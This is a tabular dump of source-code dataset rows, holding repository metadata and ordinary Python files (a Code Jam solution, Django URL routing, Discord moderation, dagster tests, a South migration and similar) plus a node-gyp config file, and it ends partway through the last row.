blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a85110d0091d407c2364cee12549f5de1adf8a07 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5744014401732608_0/Python/ArbokEkans/C.py | 413f74cc89b84cfd4dc8d0ba77d001600a4d53ea | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | def solve():
b, m = [int(i) for i in input().split()]
if m > 2**(b-2):
return "IMPOSSIBLE"
else:
graph = construct(b)
rep = bin(m)[2:][::-1]
if m == 2**(b-2):
for key in graph:
if key != b-1:
graph[key].append(b-1)
else:
for i, digit in enumerate(rep):
if digit == "1":
graph[i+1].append(b-1)
res = ["POSSIBLE"]
for i in range(b):
row = []
for j in range(b):
if j in graph[i]:
row.append(1)
else:
row.append(0)
res.append(''.join(str(x) for x in row))
return '\n'.join(res)
def construct(b):
d = {i:list(range(i+1,b-1)) for i in range(b) }
return d
n_cases = int(input())
for n_case in range(n_cases):
print("Case #{}: {}".format(n_case+1, solve()))
| [
"alexandra1.back@gmail.com"
] | alexandra1.back@gmail.com |
384e5a2f5aaa093175cc9bbf3c725320d4a8be62 | 3d7097e90391bf43dea664402e7043754e153933 | /tests/test_regression.py | 5438888cd317c8ef4c6c900a153f433cbcee265f | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | gooseproject/python-github2 | f4e0ef6c57e2e7e948f53e82ec3d30e9820ca754 | cd602dba7a7a8168920cb710b3eb35f4a1464a08 | refs/heads/master | 2021-01-18T10:09:01.759780 | 2011-11-28T07:09:18 | 2011-11-28T07:09:18 | 2,646,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 627 | py | import _setup
import httplib2
from nose.tools import assert_equals
from github2.client import Github
import utils
def test_issue_50():
"""Erroneous init of ``Http`` with proxy setup
See https://github.com/ask/python-github2/pull/50
"""
utils.set_http_mock()
client = Github(proxy_host="my.proxy.com", proxy_port=9000)
setup_args = client.request._http.called_with
assert_equals(type(setup_args['proxy_info']), httplib2.ProxyInfo)
assert_equals(setup_args['proxy_info'].proxy_host, 'my.proxy.com')
assert_equals(setup_args['proxy_info'].proxy_port, 9000)
utils.unset_http_mock()
| [
"jnrowe@gmail.com"
] | jnrowe@gmail.com |
36b479f0a4a7e4c24279afbf988d9396960305bd | 81a9840c702927b4ca9ef17b766064f1d3c9139d | /mantabot/apps/moderation/handlers/readonly.py | 212eafdce5f9d13f3499cb72f207fa73becc05d9 | [
"MIT"
] | permissive | spectras/mantabot | 58b2d996ccd359c7720006b87ab94db1ac07956f | 9b2de297d46224d66a84b8925e09cc209d8b37d4 | refs/heads/master | 2020-03-19T12:42:20.893443 | 2018-06-07T23:25:09 | 2018-06-07T23:25:09 | 136,534,522 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | import discord
from mantabot.apps.moderation import service
class ReadOnly(object):
""" Simple plugin that deletes messages sent to some channels """
name = 'moderation.readonly'
def __init__(self, client):
self.client = client
async def on_message(self, message):
channel = message.channel
if not isinstance(channel, discord.abc.GuildChannel):
return
if message.author.bot:
return
# Handle readonly
if await service.get_readonly(channel):
try:
await message.delete()
except discord.NotFound:
pass # this is okay, message is already deleted
except discord.Forbidden:
await service.set_readonly(channel, False, user=channel.guild.me, reason='forbidden')
# Handle mutes
if await service.get_channel_member_muted(channel, message.author):
try:
await message.delete()
except (discord.NotFound, discord.Forbidden):
pass
| [
"julien@etherdream.org"
] | julien@etherdream.org |
772348da544a2859bc4c5ad9664a31ec5ffa4519 | 3a3fd184aadd97380633f616c8c00877f9bf3616 | /visualizer.py | e6a1258bb441aad2089673193d9b4b4b56ab7203 | [] | no_license | nelson-io/tp2md | e62d227a54b614d11b897be9435a6eeb055b5000 | f0cead2e5b6ba373f170dde7c7693da31c8e5797 | refs/heads/master | 2023-06-12T22:16:12.692384 | 2021-07-07T14:55:26 | 2021-07-07T14:55:26 | 383,835,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,586 | py | import shapefile
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from Instance import Instance
def read_file(filename):
sf = shapefile.Reader(filename)
return sf
def get_polygons(sf, zone_filter):
r_shapes = []
r_records = []
shapes = sf.shapes()
records = sf.records()
for k in range(len(records)):
shape = shapes[k]
rec = records[k]
if rec[5] in zone_filter:
r_shapes.append(shape)
r_records.append(rec)
return r_shapes,r_records
def get_zones_ids(sf, zone_filter):
ret = []
records = sf.records()
for k in range(len(records)):
#rec = records[k]
if records[k][5] in zone_filter:
# TODO: Esto quedo dependen al orden, ya que el ID empieza desde 1.
ret.append(k+1)
return ret
def visualize_zones():
filename = 'mygeodata/taxi_zones.shp'
sf = read_file(filename)
zone_filter = ['Manhattan']
shapes,records = get_polygons(sf, zone_filter)
zone_filter_ids = get_zones_ids(sf, zone_filter)
# Plot de shapes.
for k in range(len(shapes)):
shape = shapes[k]
# Plot del polygon.
x = [i[0] for i in shape.points[:]]
y = [i[1] for i in shape.points[:]]
plt.plot(x,y,'b')
def visualize_taxis(inst):
for pnt in inst.taxis_longlat:
plt.plot(pnt[0], pnt[1], '.g')
def visualize_paxs(inst):
for pnt in inst.paxs_longlat:
plt.plot(pnt[0], pnt[1], '.r')
def main():
filename = 'input/medium_0.csv'
inst = Instance(filename)
# Visualizamos zonas, pasajeros y taxis.
visualize_zones()
visualize_paxs(inst)
visualize_taxis(inst)
# Muestra el grafico.
plt.show()
if __name__ == '__main__':
main()
| [
"nelsonshilman@gmail.com"
] | nelsonshilman@gmail.com |
18426ac763d7a141d3556b448fb271532e0d54af | 3c3095585c075002b707475b49bdd8d8c7d4b71d | /InvenTree/InvenTree/urls.py | d9600333f4698fcd539486876a45dfd4ae42af04 | [
"MIT"
] | permissive | andyseracuse/InvenTree | ffa7c0a2d131b363c0b93c2d888a9a89c0048bf7 | c5166ec845ffe9477ab488931775dcdfd1dce7e7 | refs/heads/master | 2022-06-08T12:54:11.522718 | 2020-04-20T09:30:58 | 2020-04-20T09:30:58 | 258,296,796 | 0 | 0 | MIT | 2020-04-23T18:33:12 | 2020-04-23T18:33:11 | null | UTF-8 | Python | false | false | 4,211 | py | """
Top-level URL lookup for InvenTree application.
Passes URL lookup downstream to each app as required.
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views as auth_views
from qr_code import urls as qr_code_urls
from company.urls import company_urls
from company.urls import supplier_part_urls
from company.urls import price_break_urls
from common.urls import common_urls
from part.urls import part_urls
from stock.urls import stock_urls
from build.urls import build_urls
from order.urls import order_urls
from common.api import common_api_urls
from part.api import part_api_urls, bom_api_urls
from company.api import company_api_urls
from stock.api import stock_api_urls
from build.api import build_api_urls
from order.api import po_api_urls
from django.conf import settings
from django.conf.urls.static import static
from django.views.generic.base import RedirectView
from rest_framework.documentation import include_docs_urls
from .views import IndexView, SearchView, DatabaseStatsView
from .views import SettingsView, EditUserView, SetPasswordView
from .api import InfoView, BarcodePluginView, ActionPluginView
from users.urls import user_urls
admin.site.site_header = "InvenTree Admin"
apipatterns = [
url(r'^common/', include(common_api_urls)),
url(r'^part/', include(part_api_urls)),
url(r'^bom/', include(bom_api_urls)),
url(r'^company/', include(company_api_urls)),
url(r'^stock/', include(stock_api_urls)),
url(r'^build/', include(build_api_urls)),
url(r'^po/', include(po_api_urls)),
# User URLs
url(r'^user/', include(user_urls)),
# Plugin endpoints
url(r'^barcode/', BarcodePluginView.as_view(), name='api-barcode-plugin'),
url(r'^action/', ActionPluginView.as_view(), name='api-action-plugin'),
# InvenTree information endpoint
url(r'^$', InfoView.as_view(), name='api-inventree-info'),
]
settings_urls = [
url(r'^user/?', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings-user'),
url(r'^currency/?', SettingsView.as_view(template_name='InvenTree/settings/currency.html'), name='settings-currency'),
url(r'^part/?', SettingsView.as_view(template_name='InvenTree/settings/part.html'), name='settings-part'),
url(r'^other/?', SettingsView.as_view(template_name='InvenTree/settings/other.html'), name='settings-other'),
# Catch any other urls
url(r'^.*$', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings'),
]
urlpatterns = [
url(r'^part/', include(part_urls)),
url(r'^supplier-part/', include(supplier_part_urls)),
url(r'^price-break/', include(price_break_urls)),
url(r'^common/', include(common_urls)),
url(r'^stock/', include(stock_urls)),
url(r'^company/', include(company_urls)),
url(r'^order/', include(order_urls)),
url(r'^build/', include(build_urls)),
url(r'^auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^login/', auth_views.LoginView.as_view(), name='login'),
url(r'^logout/', auth_views.LogoutView.as_view(template_name='registration/logout.html'), name='logout'),
url(r'^settings/', include(settings_urls)),
url(r'^edit-user/', EditUserView.as_view(), name='edit-user'),
url(r'^set-password/', SetPasswordView.as_view(), name='set-password'),
url(r'^admin/', admin.site.urls, name='inventree-admin'),
url(r'^qr_code/', include(qr_code_urls, namespace='qr_code')),
url(r'^index/', IndexView.as_view(), name='index'),
url(r'^search/', SearchView.as_view(), name='search'),
url(r'^stats/', DatabaseStatsView.as_view(), name='stats'),
url(r'^api/', include(apipatterns)),
url(r'^api-doc/', include_docs_urls(title='InvenTree API')),
url(r'^markdownx/', include('markdownx.urls')),
]
# Static file access
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
# Media file access
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Send any unknown URLs to the parts page
urlpatterns += [url(r'^.*$', RedirectView.as_view(url='/index/', permanent=False), name='index')]
| [
"oliver.henry.walters@gmail.com"
] | oliver.henry.walters@gmail.com |
b68aa04ef1b14cb85f42489bcf405eaa5831e2fc | c31ed14ca7c5be722914065712c3c02a11aa2d21 | /mmd_coral_tuning.py | 462657c38c1a3dfa0ebb47e720b2da2f4ea46c4a | [] | permissive | manasaKay/ECN | b272d8eb5b1c77f22b5f19da6af520c00daae613 | 69d977f942d1071f65cc9c797b58968bb6e9cfdb | refs/heads/master | 2021-01-16T02:16:44.792118 | 2020-03-22T03:14:27 | 2020-03-22T03:14:27 | 242,940,872 | 1 | 1 | Apache-2.0 | 2020-02-25T07:48:29 | 2020-02-25T07:48:28 | null | UTF-8 | Python | false | false | 1,180 | py | import os
lmds = ['0', '0.3']
lmd_exts = ['0.33', '0.66', '1']
ignore = []
for lmd in lmds:
for lmd_ext in lmd_exts:
if (lmd, lmd_ext) in ignore:
continue
print(lmd, lmd_ext)
os.system("python3 main.py -s duke -t market -cs cyclegan -mmd 1 --lmd %s --lmd_ext %s >log_mmd_d_m_%s,%s.txt 2>error.txt" % (lmd, lmd_ext, lmd, lmd_ext))
os.system("python3 main.py -s market -t duke -cs cyclegan -mmd 1 --lmd %s --lmd_ext %s >log_mmd_m_d_%s,%s.txt 2>error.txt" % (lmd, lmd_ext, lmd, lmd_ext))
os.system("python3 main.py -s duke -t market -cs cyclegan -coral 1 --lmd %s --lmd_ext %s >log_coral_d_m_%s,%s.txt 2>error.txt" % (lmd, lmd_ext, lmd, lmd_ext))
os.system("python3 main.py -s market -t duke -cs cyclegan -coral 1 --lmd %s --lmd_ext %s >log_coral_m_d_%s,%s.txt 2>error.txt" % (lmd, lmd_ext, lmd, lmd_ext))
os.system("python3 main.py -s duke -t market -cs stargan -mmd 1 --lmd 0.3 --lmd_ext 0.33 >log_stargan_d_m_%s,%s.txt 2>error.txt" % (0.3, 0.33, 0.3, 0.33))
os.system("python3 main.py -s market -t duke -cs stargan -mmd 1 --lmd 0.3 --lmd_ext 0.33 >log_stargan_m_d_%s,%s.txt 2>error.txt" % (0.3, 0.33, 0.3, 0.33))
| [
"vshreenivasbharadwaj@gmail.com"
] | vshreenivasbharadwaj@gmail.com |
de4eb11b9d3fb32491b937218fc764246a99e35c | a4aba0209f7e79cc76a33708f6f4a9b762493ccf | /python_modules/dagster/dagster_tests/cli_tests/test_new_repo.py | 12f5e7b7282a0b729e3b14e25ede7593b1bba34d | [
"Apache-2.0"
] | permissive | withshubh/dagster | bf0bdf2900bbe36897aab6cf22c44c937cfe5f01 | ff4a0db53e126f44097a337eecef54988cc718ef | refs/heads/master | 2023-04-26T13:13:52.822058 | 2021-04-18T14:19:09 | 2021-04-18T14:19:09 | 347,608,266 | 0 | 0 | Apache-2.0 | 2021-03-14T12:44:13 | 2021-03-14T10:41:29 | null | UTF-8 | Python | false | false | 1,112 | py | import os
import pytest
from click.testing import CliRunner
from dagster import seven
from dagster.cli import new_repo_cli
def test_new_repo_command_fails_when_dir_path_exists():
runner = CliRunner()
with runner.isolated_filesystem():
os.mkdir("existing_dir")
result = runner.invoke(new_repo_cli, ["existing_dir"])
assert isinstance(result.exception, FileExistsError)
assert result.exit_code != 0
def test_new_repo_command_fails_when_file_path_exists():
runner = CliRunner()
with runner.isolated_filesystem():
open("existing_file", "a").close()
result = runner.invoke(new_repo_cli, ["existing_file"])
assert isinstance(result.exception, FileExistsError)
assert result.exit_code != 0
def test_new_repo_command_succeeds():
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(new_repo_cli, ["my_repo"])
assert result.exit_code == 0
assert os.path.exists("my_repo")
assert os.path.exists("my_repo/my_repo")
assert os.path.exists("my_repo/my_repo_tests")
| [
"bob@elementl.com"
] | bob@elementl.com |
e22d5f152a0bf964017d4b203369e55a8be98e94 | 294674af77e7c98af12f92f995633c24356e05ff | /entry.py | 9ef1c858ed20686695d14b414ec96d9444453115 | [] | no_license | RenderingMan/OSRS_bot_keras | 449c59df449b45bab686f0760d86571d6c1f4039 | 651786baa1cff2c7ea7abaec39ec296126c3e91e | refs/heads/master | 2022-11-20T01:23:39.729853 | 2020-07-25T14:50:58 | 2020-07-25T14:50:58 | 282,461,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | import wc
import imf
from PIL import ImageFilter
import inv
import ca
import botWD
import nnet
import PIL
import sys
#train copper powerminer script neural network
def trainNetworks():
trainImg = ["./images/oreRocks42/"]
fi = ["./images/ground42/","./images/treeBase42/","./images/treeTop42/","./images/junk42/","./images/npc42/","./images/oreJunk42/"]
nnet.trainNetwork(trainImg,fi,"./networks/oreRocksNet42",42,45)
for a in sys.argv:
if(a == "-train"):
trainNetworks()
sys.exit(1)
#find osrs window handle
rsw = wc.RsWindow()
#create powerminer script instance
n = botWD.PowerMineBotNN(rsw)
#run indefinetly
n.start()
| [
"noreply@github.com"
] | RenderingMan.noreply@github.com |
bec55f68b09aa8b4200be2eb77b0e66d7eb57d09 | abc41fdcacdc49896d2891eae91d3c75c4724011 | /venv/lib/python3.6/site-packages/jsontableschema/types/base.py | 07c43807094673b6430ac7e899491d2fdec06c32 | [] | no_license | department-of-general-services/Data-Validation | fbafd83d930d9790b4c55ad21667631c0a517cf5 | 2d9a15c72521dcc6fa899e399b34a7c368dc8a09 | refs/heads/master | 2020-07-24T08:17:03.513677 | 2019-03-18T19:50:49 | 2019-03-18T19:50:49 | 207,861,207 | 1 | 0 | null | 2019-09-11T16:47:35 | 2019-09-11T16:47:35 | null | UTF-8 | Python | false | false | 5,674 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from six import add_metaclass
from functools import partial
from abc import ABCMeta, abstractmethod
from .. import compat
from .. import helpers
from .. import exceptions
from .. import constraints
# Module API
@add_metaclass(ABCMeta)
class JTSType(object):
"""Base class for all JSON Table Schema types.
Args:
field (dict): field schema
Aside implementing `cast_default` subclass could add other cast methods
with the same signature like `cast_fmt`, `cast_current` etc
to add support for corresponding formats.
"""
# Public
@property
@abstractmethod
def name(self):
"""str: type name like `array`
"""
pass # pragma: no cover
@property
@abstractmethod
def null_values(self):
"""str[]: list of strings to process as null value
"""
pass # pragma: no cover
@property
@abstractmethod
def supported_constraints(self):
"""str[]: list of supported JTS constraints
"""
pass # pragma: no cover
def __init__(self, field=None):
# Set default field
self.__field = {}
self.__field_name = None
self.__format = 'default'
self.__constraints = {}
# Set user defined field
if field:
self.__field = field
self.__field_name = field['name']
self.__format = field.get('format', 'default')
self.__constraints = field.get('constraints', {})
# Set parsed format (fmt feature)
self.__format_main = self.__format
self.__format_fmt = None
if self.__format.startswith('fmt:'):
self.__format_main = 'fmt'
self.__format_fmt = self.__format[4:]
@property
def field(self):
"""Returns original field object for this type
Should be used for getting extra properties for this type
"""
return self.__field
def cast(self, value, skip_constraints=False):
"""Cast value.
Args:
value (any): value to cast
skip_constraints (bool): if True it skips constraints checks
Returns:
any: cast value
"""
# If value is null
if self.__is_null(value):
# Check required constraint
if not skip_constraints:
missing_values = self.field.get('missingValues', [])
required = self.__constraints.get('required', False)
constraints.check_required(
self.__field_name, value, required,
self.null_values + missing_values + [None])
return None
# Check pattern constraint
if not skip_constraints:
# Only if value not cast
if isinstance(value, compat.str):
pattern = self.__constraints.get('pattern', None)
if pattern is not None:
constraints.check_pattern(
self.__field_name, value, pattern)
# Cast value
cast_name = 'cast_%s' % self.__format_main
cast_func = getattr(self, cast_name, self.cast_default)
cast_value = cast_func(value, self.__format_fmt)
# Check against post-cast constraints
if not skip_constraints:
for check_name, check_value in self.__constraints.items():
# We can't handle unique constraint on this level
# (shouldn't be added to supported_constraints in subclass)
if check_name in ['unique']:
continue
if check_name in ['required', 'pattern']:
continue
if check_name not in self.supported_constraints:
raise exceptions.ConstraintNotSupported(
"Field type '{0}' does not support the {1} constraint"
.format(self.name, check_name))
if check_name in ['minimum', 'maximum']:
check_value = self.cast(check_value, skip_constraints=True)
if check_name in ['enum']:
mapper = partial(self.cast, skip_constraints=True)
check_value = map(mapper, check_value)
check_func = getattr(constraints, 'check_%s' % check_name)
check_func(self.__field_name, cast_value, check_value)
return cast_value
def test(self, value):
"""Test value could be cast.
Args:
value (any): value to check
Returns:
bool: could be cast
"""
try:
self.cast(value)
return True
except exceptions.InvalidCastError:
return False
@abstractmethod
def cast_default(self, value, fmt=None):
"""Cast default.
Args:
value (any): value to cast
format (str): secondary format (JTS's "fmt")
"""
pass # pragma: no cover
# Private
def __is_null(self, value):
"""Check for null value.
If value is string-like, will strip it before testing.
Args:
value (any): value to test for nullity
Returns:
true if a null value
"""
missing_values = self.field.get('missingValues', [])
null_values = self.null_values + missing_values
null_values = map(helpers.normalize_value, null_values)
return helpers.normalize_value(value) in null_values
| [
"babila.lima30@gmail.com"
] | babila.lima30@gmail.com |
e2a811d5af7d9c83a519a178aba99267740a9328 | 0b793bce2da8c3d09b7956c0672ddbffd46feaed | /atcoder/corp/ddcc2016_qa.py | 1c35c9661ac08bed450194c2318fc510b368dd9d | [
"MIT"
] | permissive | knuu/competitive-programming | c6c4e08fb231937d988bdc5a60a8ad6b31b97616 | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | refs/heads/master | 2021-01-17T09:39:02.647688 | 2020-11-07T03:17:22 | 2020-11-07T03:17:22 | 27,886,732 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | A, B, C = map(int, input().split())
print('{:.20f}'.format(C * B / A))
| [
"premier3next@gmail.com"
] | premier3next@gmail.com |
e374f33c326e267b3a9f05a3fed91e3d6859b383 | 4f77be303dc12ed8d44e446d41183734fbf49b12 | /softlearning/replay_pools/union_pool.py | 072bb1681f59b7fb7434447f36f0889177325af1 | [
"MIT"
] | permissive | YaoYao1995/mbpo | b815faeee20b8b2ba89424875618b1552b1f3039 | b9571e469459ce3a632b19dc3fee68c9ac3857b2 | refs/heads/master | 2022-12-21T05:04:30.245426 | 2020-09-24T03:15:01 | 2020-09-24T03:15:01 | 295,150,853 | 1 | 0 | MIT | 2020-09-13T12:53:09 | 2020-09-13T12:53:08 | null | UTF-8 | Python | false | false | 1,307 | py | import numpy as np
from .replay_pool import ReplayPool
class UnionPool(ReplayPool):
def __init__(self, pools):
pool_sizes = np.array([b.size for b in pools])
self._total_size = sum(pool_sizes)
self._normalized_pool_sizes = pool_sizes / self._total_size
self.pools = pools
def add_sample(self, *args, **kwargs):
raise NotImplementedError
def terminate_episode(self):
raise NotImplementedError
@property
def size(self):
return self._total_size
def add_path(self, **kwargs):
raise NotImplementedError
def random_batch(self, batch_size):
# TODO: Hack
partial_batch_sizes = self._normalized_pool_sizes * batch_size
partial_batch_sizes = partial_batch_sizes.astype(int)
partial_batch_sizes[0] = batch_size - sum(partial_batch_sizes[1:])
partial_batches = [
pool.random_batch(partial_batch_size) for pool,
partial_batch_size in zip(self.pools, partial_batch_sizes)
]
def all_values(key):
return [partial_batch[key] for partial_batch in partial_batches]
keys = partial_batches[0].keys()
return {key: np.concatenate(all_values(key), axis=0) for key in keys}
| [
"474127934@qq.com"
] | 474127934@qq.com |
ec7e06d56f565b52aa93c57e50dca218c289561d | ade45b78d7794fa216d27678ea149788f239446d | /node_modules/mongojs/node_modules/kerberos/build/config.gypi | d8d6f532fa1a865f529146eecbd50a7afad1ff6e | [
"Apache-2.0",
"MIT"
] | permissive | stevenm0084/contactListApp | d95c268a8cb49fd7e64e88bc6052e43bd4744882 | f120de58621113cb8fc5c45097145b41ed9560e0 | refs/heads/master | 2021-01-10T03:29:08.602453 | 2015-11-24T20:35:40 | 2015-11-24T20:35:40 | 46,609,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,785 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"host_arch": "x64",
"icu_data_file": "icudt56l.dat",
"icu_data_in": "../../deps/icu/source/data/in\\icudt56l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps\\icu",
"icu_small": "true",
"icu_ver_major": "56",
"node_byteorder": "little",
"node_install_npm": "true",
"node_prefix": "/usr/local",
"node_release_urlbase": "",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"openssl_fips": "",
"openssl_no_asm": 0,
"python": "C:\\Python27\\python.exe",
"target_arch": "ia32",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": 1,
"want_separate_host_toolset": 1,
"nodedir": "C:\\Users\\PC1\\.node-gyp\\4.2.2",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"access": "",
"always_auth": "",
"bin_links": "true",
"browser": "",
"ca": "",
"cache": "C:\\Users\\PC1\\AppData\\Roaming\\npm-cache",
"cache_lock_retries": "10",
"cache_lock_stale": "60000",
"cache_lock_wait": "10000",
"cache_max": "Infinity",
"cache_min": "10",
"cafile": "",
"cert": "",
"color": "true",
"depth": "Infinity",
"description": "true",
"dev": "",
"editor": "notepad.exe",
"engine_strict": "",
"fetch_retries": "2",
"fetch_retry_factor": "10",
"fetch_retry_maxtimeout": "60000",
"fetch_retry_mintimeout": "10000",
"force": "",
"git": "git",
"git_tag_version": "true",
"global": "",
"globalconfig": "C:\\Users\\PC1\\AppData\\Roaming\\npm\\etc\\npmrc",
"globalignorefile": "C:\\Users\\PC1\\AppData\\Roaming\\npm\\etc\\npmignore",
"group": "",
"heading": "npm",
"https_proxy": "",
"if_present": "",
"ignore_scripts": "",
"init_author_email": "",
"init_author_name": "",
"init_author_url": "",
"init_license": "ISC",
"init_module": "C:\\Users\\PC1\\.npm-init.js",
"init_version": "1.0.0",
"json": "",
"key": "",
"link": "",
"local_address": "",
"long": "",
"message": "%s",
"node_version": "4.2.2",
"npat": "",
"onload_script": "",
"optional": "true",
"parseable": "",
"prefix": "C:\\Users\\PC1\\AppData\\Roaming\\npm",
"production": "",
"proprietary_attribs": "true",
"rebuild_bundle": "true",
"registry": "https://registry.npmjs.org/",
"rollback": "true",
"save": "",
"save_bundle": "",
"save_dev": "",
"save_exact": "",
"save_optional": "",
"save_prefix": "^",
"scope": "",
"searchexclude": "",
"searchopts": "",
"searchsort": "name",
"shell": "C:\\Windows\\system32\\cmd.exe",
"shrinkwrap": "true",
"sign_git_tag": "",
"spin": "true",
"strict_ssl": "true",
"tag": "latest",
"tag_version_prefix": "v",
"tmp": "C:\\Users\\PC1\\AppData\\Local\\Temp",
"umask": "0000",
"unicode": "true",
"unsafe_perm": "true",
"usage": "",
"user": "",
"userconfig": "C:\\Users\\PC1\\.npmrc",
"user_agent": "npm/2.14.7 node/v4.2.2 win32 ia32",
"version": "",
"versions": "",
"viewer": "browser"
}
}
| [
"steven.marks1@my.jcu.edu.au"
] | steven.marks1@my.jcu.edu.au |
8fddcccf8a50a7b00db56be3a20a3f31347fac88 | 82d588161a8f8cd27c3031c779120ea4380791b9 | /yejin/삼성 SW 역량 테스트 기출 문제/2021 하반기/13458.py | 0e77a2dfcaf4b39f4e2dc3fcea152240ebab6c5f | [] | no_license | Yejin6911/Algorithm_Study | 3aa02a7d07169382a78c049d1de8251a52da816c | 98c968bfeed17ab6b62e3a077280e0310f08190a | refs/heads/master | 2023-09-01T00:31:07.212413 | 2021-10-24T07:56:21 | 2021-10-24T07:56:21 | 345,009,057 | 1 | 1 | null | 2021-09-20T13:08:33 | 2021-03-06T04:57:34 | Python | UTF-8 | Python | false | false | 343 | py | import sys
import math
input = sys.stdin.readline
n = int(input())
A = list(map(int, input().split()))
B, C = map(int, input().split())
total = n
# 총감독관 감시 인원 제외
for i in range(n):
if A[i] <= B:
A[i] = 0
else:
A[i] -= B
# 부감독관 인원 계산
total += math.ceil(A[i]/C)
print(total)
| [
"cdjin6911@gmail.com"
] | cdjin6911@gmail.com |
39284a14d2d9460ad8fd2b989ea22376d77ee320 | b288d8d27ddd5c4ec71554a43271e79a71337bf1 | /django_facebook/migrations/0006_auto__del_facebookfriend__del_unique_facebookfriend_friend_of_uid.py | 68cb21c1b32a2c7da54391bd16c27a86f70c416e | [] | no_license | ash211/django-facebook | cb3b0b43e654fffea33a7b9af2411a55fba251bb | a1340843aa94cb179271fa57e5f45c45bb0b11b4 | refs/heads/master | 2020-12-25T00:50:19.496908 | 2011-04-02T03:36:29 | 2011-04-02T03:36:29 | 1,305,318 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,266 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing unique constraint on 'FacebookFriend', fields ['friend_of', 'uid']
db.delete_unique('django_facebook_facebookfriend', ['friend_of_id', 'uid'])
# Deleting model 'FacebookFriend'
db.delete_table('django_facebook_facebookfriend')
def backwards(self, orm):
# Adding model 'FacebookFriend'
db.create_table('django_facebook_facebookfriend', (
('uid', self.gf('django.db.models.fields.CharField')(max_length=31)),
('friend_of', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['django_facebook.FacebookProfile'])),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
))
db.send_create_signal('django_facebook', ['FacebookFriend'])
# Adding unique constraint on 'FacebookFriend', fields ['friend_of', 'uid']
db.create_unique('django_facebook_facebookfriend', ['friend_of_id', 'uid'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
